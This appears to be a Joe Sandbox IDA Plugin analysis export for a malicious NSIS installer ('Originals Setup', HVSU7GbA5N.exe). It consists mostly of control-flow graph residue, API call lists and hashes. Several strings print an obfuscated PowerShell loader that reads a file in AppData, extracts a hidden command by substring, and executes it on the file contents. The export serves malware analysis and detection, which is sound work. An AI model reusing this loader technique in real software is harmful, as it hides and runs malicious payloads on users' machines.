3357->3359 3358->3357 3496 4038d3 3359->3496 3362 40573b 18 API calls 3363 4036b5 3362->3363 3364 40373e 3363->3364 3366 405aa4 3 API calls 3363->3366 3365 40573b 18 API calls 3364->3365 3367 403744 3365->3367 3375 4036e1 3366->3375 3368 403754 LoadImageA 3367->3368 3369 405bdf 18 API calls 3367->3369 3370 4037fa 3368->3370 3371 40377b RegisterClassA 3368->3371 3369->3368 3373 40140b 2 API calls 3370->3373 3372 4037b1 SystemParametersInfoA CreateWindowExA 3371->3372 3401 403804 3371->3401 3372->3370 3378 403800 3373->3378 3374 4036fd lstrlenA 3376 403731 3374->3376 3377 40370b lstrcmpiA 3374->3377 3375->3364 3375->3374 3379 405678 CharNextA 3375->3379 3381 40564d 3 API calls 3376->3381 3377->3376 3380 40371b GetFileAttributesA 3377->3380 3384 4038d3 19 API calls 3378->3384 3378->3401 3382 4036fb 3379->3382 3383 403727 3380->3383 3385 403737 3381->3385 3382->3374 3383->3376 3386 405694 2 API calls 3383->3386 3387 403811 3384->3387 3506 405bbd lstrcpynA 3385->3506 3386->3376 3389 4038a0 3387->3389 3390 40381d ShowWindow LoadLibraryA 3387->3390 3391 404f78 5 API calls 3389->3391 3392 403843 GetClassInfoA 3390->3392 3393 40383c LoadLibraryA 3390->3393 3394 4038a6 3391->3394 3395 403857 GetClassInfoA RegisterClassA 3392->3395 3396 40386d DialogBoxParamA 3392->3396 3393->3392 3397 4038c2 3394->3397 3398 4038aa 3394->3398 3395->3396 3399 40140b 2 API calls 3396->3399 3400 40140b 2 API calls 3397->3400 3398->3401 3402 40140b 2 API calls 3398->3402 3399->3401 3400->3401 3401->3255 3402->3401 3403->3243 3508 405bbd lstrcpynA 3404->3508 3406 40574c 3407 4056e6 4 API calls 3406->3407 3408 405752 3407->3408 3409 403342 3408->3409 3410 405e28 5 API calls 3408->3410 3409->3255 3418 405bbd lstrcpynA 3409->3418 3416 405762 3410->3416 3411 40578d lstrlenA 3412 405798 3411->3412 3411->3416 3413 40564d 3 API calls 3412->3413 3415 40579d GetFileAttributesA 3413->3415 3414 405ec1 2 API calls 3414->3416 3415->3409 3416->3409 3416->3411 3416->3414 3417 405694 2 API calls 3416->3417 
3417->3411 3418->3288 3419->3258 3421 40354c 3420->3421 3422 40353e CloseHandle 3420->3422 3509 403579 3421->3509 3422->3421 3427->3280 3428->3304 3430 405ee8 3 API calls 3429->3430 3431 405a78 3430->3431 3433 405a99 3431->3433 3563 4058f5 lstrcpyA 3431->3563 3433->3304 3435 4030a0 CreateDirectoryA 3434->3435 3436 405667 lstrcatA 3434->3436 3437 40587d 3435->3437 3436->3435 3438 405888 GetTickCount GetTempFileNameA 3437->3438 3439 4030b4 3438->3439 3440 4058b5 3438->3440 3439->3245 3440->3438 3440->3439 3441->3323 3442->3325 3444 4056a1 3443->3444 3445 402c95 3444->3445 3446 4056a6 CharPrevA 3444->3446 3447 405bbd lstrcpynA 3445->3447 3446->3444 3446->3445 3447->3329 3449 402be6 3448->3449 3450 402bce 3448->3450 3453 402bf6 GetTickCount 3449->3453 3454 402bee 3449->3454 3451 402bd7 DestroyWindow 3450->3451 3452 402bde 3450->3452 3451->3452 3452->3332 3456 402c04 CreateDialogParamA ShowWindow 3453->3456 3457 402c27 3453->3457 3455 405f21 2 API calls 3454->3455 3458 402bf4 3455->3458 3456->3457 3457->3332 3458->3332 3459->3340 3462 402e78 3460->3462 3461 402ea3 3464 403055 ReadFile 3461->3464 3462->3461 3493 40306b SetFilePointer 3462->3493 3465 402eae 3464->3465 3466 402ec0 GetTickCount 3465->3466 3467 402fe9 3465->3467 3474 402fd4 3465->3474 3478 402ed3 3466->3478 3468 402fed 3467->3468 3470 403005 3467->3470 3469 403055 ReadFile 3468->3469 3469->3474 3471 403055 ReadFile 3470->3471 3473 403020 WriteFile 3470->3473 3470->3474 3471->3470 3472 403055 ReadFile 3472->3478 3473->3474 3475 403035 3473->3475 3474->3347 3475->3470 3475->3474 3477 402f39 GetTickCount 3477->3478 3478->3472 3478->3474 3478->3477 3479 402f62 MulDiv wsprintfA 3478->3479 3480 402fa0 WriteFile 3478->3480 3486 405fe8 3478->3486 3481 404ea6 25 API calls 3479->3481 3480->3474 3480->3478 3481->3478 3494 4058c6 ReadFile 3482->3494 3485->3339 3487 40600d 3486->3487 3488 406015 3486->3488 3487->3478 3488->3487 3489 4060a5 GlobalAlloc 3488->3489 3490 40609c GlobalFree 3488->3490 3491 406113 GlobalFree 
3488->3491 3492 40611c GlobalAlloc 3488->3492 3489->3487 3489->3488 3490->3489 3491->3492 3492->3487 3492->3488 3493->3461 3495 403068 3494->3495 3495->3343 3497 4038e7 3496->3497 3507 405b1b wsprintfA 3497->3507 3499 403958 3500 405bdf 18 API calls 3499->3500 3501 403964 SetWindowTextA 3500->3501 3502 403980 3501->3502 3503 403693 3501->3503 3502->3503 3504 405bdf 18 API calls 3502->3504 3503->3362 3504->3502 3505->3359 3506->3364 3507->3499 3508->3406 3510 403587 3509->3510 3511 403551 3510->3511 3512 40358c FreeLibrary GlobalFree 3510->3512 3513 40547d 3511->3513 3512->3511 3512->3512 3514 40573b 18 API calls 3513->3514 3515 40549d 3514->3515 3516 4054a5 DeleteFileA 3515->3516 3517 4054bc 3515->3517 3544 403375 OleUninitialize 3516->3544 3520 4055ea 3517->3520 3550 405bbd lstrcpynA 3517->3550 3519 4054e2 3521 4054f5 3519->3521 3522 4054e8 lstrcatA 3519->3522 3523 405ec1 2 API calls 3520->3523 3520->3544 3525 405694 2 API calls 3521->3525 3524 4054fb 3522->3524 3526 40560e 3523->3526 3527 405509 lstrcatA 3524->3527 3528 405514 lstrlenA FindFirstFileA 3524->3528 3525->3524 3529 40564d 3 API calls 3526->3529 3526->3544 3527->3528 3528->3520 3548 405538 3528->3548 3531 405618 3529->3531 3530 405678 CharNextA 3530->3548 3532 405435 5 API calls 3531->3532 3533 405624 3532->3533 3534 405628 3533->3534 3535 40563e 3533->3535 3540 404ea6 25 API calls 3534->3540 3534->3544 3536 404ea6 25 API calls 3535->3536 3536->3544 3537 4055c9 FindNextFileA 3539 4055e1 FindClose 3537->3539 3537->3548 3539->3520 3541 405635 3540->3541 3542 405a71 40 API calls 3541->3542 3542->3544 3544->3266 3544->3267 3545 40547d 64 API calls 3545->3548 3546 404ea6 25 API calls 3546->3537 3547 404ea6 25 API calls 3547->3548 3548->3530 3548->3537 3548->3545 3548->3546 3548->3547 3549 405a71 40 API calls 3548->3549 3551 405bbd lstrcpynA 3548->3551 3552 405435 3548->3552 3549->3548 3550->3519 3551->3548 3560 405829 GetFileAttributesA 3552->3560 3555 405462 3555->3548 3556 405450 RemoveDirectoryA 3558 
Control-flow graph edge lists (figure residue from the rendered graphs; per-node edge data omitted). The residue covers the tail of a file-handling routine calling DeleteFileA, SetFileAttributesA, GetShortPathNameA, GetFileAttributesA, CreateFileA, ReadFile, SetFilePointer and WriteFile, and the graphs for the functions at 402036 (CoCreateInstance, MultiByteToWideChar), 4014b7, 401bb8 (FindWindowExA, SendMessageA, SendMessageTimeoutA), 40243a (RegOpenKeyExA, RegEnumKeyA, RegEnumValueA, RegCloseKey), 40223b (WritePrivateProfileStringA), 403fbc (GetDlgItem, SendMessageA, CheckDlgButton, GetSysColor), 40173f (lstrcpynA, lstrcatA, CompareFileTime, SetFileTime, CloseHandle, MessageBoxIndirectA), 40163f and 40193f (lstrlenA, lstrcpynA).

Control-flow Graph

control_flow_graph 0: function at 4030b6 (rendered graph omitted; the edge data is figure residue, and the APIs reached from this graph are listed under APIs below).
APIs
• #17.COMCTL32 ref: 004030D7
• SetErrorMode.KERNELBASE(00008001), ref: 004030E2
• OleInitialize.OLE32(00000000), ref: 004030E9
  • Part of subcall function 00405EE8: GetModuleHandleA.KERNEL32(?,?,?,004030FB,00000009), ref: 00405EFA
  • Part of subcall function 00405EE8: LoadLibraryA.KERNELBASE(?,?,?,004030FB,00000009), ref: 00405F05
  • Part of subcall function 00405EE8: GetProcAddress.KERNEL32(00000000,?), ref: 00405F16
• SHGetFileInfoA.SHELL32(0041EC98,00000000,?,00000160,00000000,00000009), ref: 00403111
  • Part of subcall function 00405BBD: lstrcpynA.KERNEL32(?,?,00000400,00403126,Originals Setup,NSIS Error), ref: 00405BCA
• GetCommandLineA.KERNEL32(Originals Setup,NSIS Error), ref: 00403126
• GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\HVSU7GbA5N.exe",00000000), ref: 00403139
• CharNextA.USER32(00000000,"C:\Users\user\Desktop\HVSU7GbA5N.exe",00000020), ref: 00403164
• GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403261
• GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403272
• lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040327E
• GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403292
• lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040329A
• SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004032AB
• SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004032B3
• DeleteFileA.KERNELBASE(1033), ref: 004032C7
• OleUninitialize.OLE32(?), ref: 00403375
• ExitProcess.KERNEL32 ref: 00403395
• lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\HVSU7GbA5N.exe",00000000,?), ref: 004033A1
• lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop), ref: 004033AD
• CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 004033B9
• SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 004033C0
• DeleteFileA.KERNEL32(0041E898,0041E898,?,"$Delfisk=Get-Content -Raw 'C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\Sprngningen178.Gte';$Bats=$Delfisk.SubString(73884,3);.$Bats($Delfisk)" ,?), ref: 00403419
• CopyFileA.KERNEL32(C:\Users\user\Desktop\HVSU7GbA5N.exe,0041E898,00000001), ref: 0040342D
• CloseHandle.KERNEL32(00000000,0041E898,0041E898,?,0041E898,00000000), ref: 0040345A
• GetCurrentProcess.KERNEL32(00000028,?,00000006,00000005,00000004), ref: 004034B3
• ExitWindowsEx.USER32(00000002,80040002), ref: 0040350B
• ExitProcess.KERNEL32 ref: 0040352E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
Similarity
• API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
• String ID: "$"$Delfisk=Get-Content -Raw 'C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\Sprngningen178.Gte';$Bats=$Delfisk.SubString(73884,3);.$Bats($Delfisk)" $"C:\Users\user\Desktop\HVSU7GbA5N.exe"$1033$C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens$C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\HVSU7GbA5N.exe$Error launching installer$Low$NSIS Error$Originals Setup$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
• API String ID: 4107622049-1981984989
• Opcode ID: a2a75be3d011132d4618424123a2539fe2665dee191949de8570e11e155f9849
• Instruction ID: 19acd6a9e22a62aa3fa635d9352380a3979e711e0520c28b60a65d3217cef685
• Opcode Fuzzy Hash: a2a75be3d011132d4618424123a2539fe2665dee191949de8570e11e155f9849
• Instruction Fuzzy Hash: 87B1E370A082516AE7216F755C89B2B7EACEB45306F04057FF581B62D2C77C9E01CB6E

Control-flow Graph

control_flow_graph 118: function at 404fe4 (rendered graph omitted; the edge data is figure residue, and the APIs reached from this graph are listed under APIs below).
APIs
• GetDlgItem.USER32(?,00000403), ref: 00405043
• GetDlgItem.USER32(?,000003EE), ref: 00405052
• GetClientRect.USER32(?,?), ref: 0040508F
• GetSystemMetrics.USER32(00000002), ref: 00405096
• SendMessageA.USER32(?,0000101B,00000000,?), ref: 004050B7
• SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004050C8
• SendMessageA.USER32(?,00001001,00000000,?), ref: 004050DB
• SendMessageA.USER32(?,00001026,00000000,?), ref: 004050E9
• SendMessageA.USER32(?,00001024,00000000,?), ref: 004050FC
• ShowWindow.USER32(00000000,?,0000001B,?), ref: 0040511E
• ShowWindow.USER32(?,00000008), ref: 00405132
• GetDlgItem.USER32(?,000003EC), ref: 00405153
• SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405163
• SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040517C
• SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405188
• GetDlgItem.USER32(?,000003F8), ref: 00405061
  • Part of subcall function 00403EA8: SendMessageA.USER32(00000028,?,00000001,00403CD9), ref: 00403EB6
• GetDlgItem.USER32(?,000003EC), ref: 004051A4
• CreateThread.KERNELBASE(00000000,00000000,Function_00004F78,00000000), ref: 004051B2
• CloseHandle.KERNELBASE(00000000), ref: 004051B9
• ShowWindow.USER32(00000000), ref: 004051DC
• ShowWindow.USER32(?,00000008), ref: 004051E3
• ShowWindow.USER32(00000008), ref: 00405229
• SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040525D
• CreatePopupMenu.USER32 ref: 0040526E
• AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405283
• GetWindowRect.USER32(?,000000FF), ref: 004052A3
• TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004052BC
• SendMessageA.USER32(?,0000102D,00000000,?), ref: 004052F8
• OpenClipboard.USER32(00000000), ref: 00405308
• EmptyClipboard.USER32 ref: 0040530E
• GlobalAlloc.KERNEL32(00000042,?), ref: 00405317
• GlobalLock.KERNEL32(00000000), ref: 00405321
• SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405335
• GlobalUnlock.KERNEL32(00000000), ref: 0040534E
• SetClipboardData.USER32(00000001,00000000), ref: 00405359
• CloseClipboard.USER32 ref: 0040535F
Strings
• Originals Setup: Completed, xrefs: 004052D4
Memory Dump Source
• Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
Similarity
• API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
• String ID: Originals Setup: Completed
• API String ID: 590372296-1959725480
• Opcode ID: 7afbd6bb534d64d4964d763d2f7a56bb17a1bb4ac360bf80618473dd1d5dafb6
• Instruction ID: 5eb751775e690fc0911b0246dac1cecdda29a979763143f7b886e47eaa108cfb
• Opcode Fuzzy Hash: 7afbd6bb534d64d4964d763d2f7a56bb17a1bb4ac360bf80618473dd1d5dafb6
• Instruction Fuzzy Hash: 8AA16971900208BFDB219FA0DD89EAE7F79FB08345F10407AFA01B61A0C7B55E519FA9

Control-flow Graph
• Rendered graph not reproduced here (legend: Executed / Not Executed). Function entry 405bdf, basic blocks 405bdf-405e25, internal calls to 405aa4, 405b1b, 405bbd, 405bdf and 405e28; API calls in the graph: GetVersion, GetSystemDirectoryA, GetWindowsDirectoryA, SHGetSpecialFolderLocation, SHGetPathFromIDListA, CoTaskMemFree, lstrcatA, lstrlenA.
APIs
• GetVersion.KERNEL32(?,Completed,00000000,00404EDE,Completed,00000000), ref: 00405C90
• GetSystemDirectoryA.KERNEL32(: Completed,00000400), ref: 00405D0B
• GetWindowsDirectoryA.KERNEL32(: Completed,00000400), ref: 00405D1E
• SHGetSpecialFolderLocation.SHELL32(?,0040E888), ref: 00405D5A
• SHGetPathFromIDListA.SHELL32(0040E888,: Completed), ref: 00405D68
• CoTaskMemFree.OLE32(0040E888), ref: 00405D73
• lstrcatA.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D95
• lstrlenA.KERNEL32(: Completed,?,Completed,00000000,00404EDE,Completed,00000000), ref: 00405DE7
Strings
Memory Dump Source
• Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
Similarity
• API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
• String ID: "$Delfisk=Get-Content -Raw 'C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\Sprngningen178.Gte';$Bats=$Delfisk.SubString(73884,3);.$Bats($Delfisk)" $: Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
• API String ID: 900638850-4250441434
• Opcode ID: 6d1c9af88ffa3db3a0edcf81b4fc072c50c4b8bcf17ecc15cdbe89ff62f1b448
• Instruction ID: 05ce3077703b195791b94b96109b54625272672628b9f98d23919b5af99ad588
• Opcode Fuzzy Hash: 6d1c9af88ffa3db3a0edcf81b4fc072c50c4b8bcf17ecc15cdbe89ff62f1b448
• Instruction Fuzzy Hash: 0A610171A04A05AAEB205F24DC88BBF7BB4EF11304F50813BE941B62D0D27D5982DF8E

Control-flow Graph
• Rendered graph not reproduced here (legend: Executed / Not Executed). Function entry 406197, basic blocks spanning 40601b-406a39, no internal calls shown; API calls in the graph: GlobalAlloc, GlobalFree.
Memory Dump Source
• Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 208b979f7471c67888a02c39f93206778dc1c3e33f97723ffc6ad1ac2506ac0b
• Instruction ID: 01902b0c5badf26c21563370f74918c90dc48b9c290b8d647ce642e1aeaa84f8
• Opcode Fuzzy Hash: 208b979f7471c67888a02c39f93206778dc1c3e33f97723ffc6ad1ac2506ac0b
• Instruction Fuzzy Hash: 99F18671D00229CBDF28CFA8C8946ADBBB0FF45305F25856ED856BB281D7385A96CF44
APIs
• GetModuleHandleA.KERNEL32(?,?,?,004030FB,00000009), ref: 00405EFA
• LoadLibraryA.KERNELBASE(?,?,?,004030FB,00000009), ref: 00405F05
• GetProcAddress.KERNEL32(00000000,?), ref: 00405F16
Memory Dump Source
• Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
Similarity
• API ID: AddressHandleLibraryLoadModuleProc
• String ID:
• API String ID: 310444273-0
• Opcode ID: 6a16e0dd3cc6108475a6e7adf37e54332756fcc3f7317002038e5d5bd84af621
• Instruction ID: dd30d9296bace99b119292820e2dbffb2fd0b4cb1c2bef09bc496f5d2c6c7741
• Opcode Fuzzy Hash: 6a16e0dd3cc6108475a6e7adf37e54332756fcc3f7317002038e5d5bd84af621
• Instruction Fuzzy Hash: A6E0C232A08511ABC710AB349C08A6B77A8EFC8650304893EF501F6151D738AC11ABAE
APIs
• FindFirstFileA.KERNELBASE(?,00421528,004210E0,0040577E,004210E0,004210E0,00000000,004210E0,004210E0,?,?,75573410,0040549D,?,C:\Users\user\AppData\Local\Temp\,75573410), ref: 00405ECC
• FindClose.KERNELBASE(00000000), ref: 00405ED8
Memory Dump Source
• Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
• Opcode ID: f7c2684b86b1527493efd370d531fce5aff0e856747922587c11eb9b8a6dacaa
• Instruction ID: c8363a8003639f247cd95da1b4b67004b06b28060bca14ca5f7d033ebcfdecfd
• Opcode Fuzzy Hash: f7c2684b86b1527493efd370d531fce5aff0e856747922587c11eb9b8a6dacaa
• Instruction Fuzzy Hash: 9ED012369194206BC7005B78AC0C85B7A98EF593317608A33B5A5F52F0C7788D528AEA

Control-flow Graph
• Rendered graph not reproduced here (legend: Executed / Not Executed). Function entry 4039a0, basic blocks 4039a0-403e49, internal calls to 401389, 40140b, 403e4c, 403e73, 403e95, 403ea8, 403ebf, 403eda, 405bbd and 405bdf; API calls in the graph: GetDlgItem, SetClassLongA, SetWindowPos, ShowWindow, DestroyWindow, SetWindowLongA, SendMessageA, IsWindowEnabled, EndDialog, KiUserCallbackDispatcher, EnableWindow, GetSystemMenu, EnableMenuItem, lstrlenA, SetWindowTextA, CreateDialogParamA, GetWindowRect, ScreenToClient.
APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039DC
• ShowWindow.USER32(?), ref: 004039F9
• DestroyWindow.USER32 ref: 00403A0D
• SetWindowLongA.USER32(?,00000000,00000000), ref: 00403A29
• GetDlgItem.USER32(?,?), ref: 00403A4A
• SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A5E
• IsWindowEnabled.USER32(00000000), ref: 00403A65
• GetDlgItem.USER32(?,00000001), ref: 00403B13
• GetDlgItem.USER32(?,00000002), ref: 00403B1D
• SetClassLongA.USER32(?,000000F2,?), ref: 00403B37
• SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403B88
• GetDlgItem.USER32(?,00000003), ref: 00403C2E
• ShowWindow.USER32(00000000,?), ref: 00403C4F
• KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403C61
• EnableWindow.USER32(?,?), ref: 00403C7C
• GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403C92
• EnableMenuItem.USER32(00000000), ref: 00403C99
• SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403CB1
• SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403CC4
• lstrlenA.KERNEL32(Originals Setup: Completed,?,Originals Setup: Completed,Originals Setup), ref: 00403CED
• SetWindowTextA.USER32(?,Originals Setup: Completed), ref: 00403CFC
• ShowWindow.USER32(?,0000000A), ref: 00403E30
Memory Dump Source
• Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
Similarity
• API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
• String ID: Originals Setup$Originals Setup: Completed
• API String ID: 3282139019-952384604
• Opcode ID: c4d288c9213a4ff13c75ca07aa37345a46e4ee7ce1d3a7d01e6124bc117d097b
• Instruction ID: 6a308cc8f2d4566e8290075db2a5fe9cea5b682110ca7f7f0817dc9b094a1d3c
• Opcode Fuzzy Hash: c4d288c9213a4ff13c75ca07aa37345a46e4ee7ce1d3a7d01e6124bc117d097b
• Instruction Fuzzy Hash: 0EC1D271604204BBDB21AF61ED45E2B3E7DFB44706B40053EF641B12E1C779A942AF6E

Control-flow Graph (rendered graph image not reproduced; legend: Executed / Not Executed)
APIs
  • Part of subcall function 00405EE8: GetModuleHandleA.KERNEL32(?,?,?,004030FB,00000009), ref: 00405EFA
  • Part of subcall function 00405EE8: LoadLibraryA.KERNELBASE(?,?,?,004030FB,00000009), ref: 00405F05
  • Part of subcall function 00405EE8: GetProcAddress.KERNEL32(00000000,?), ref: 00405F16
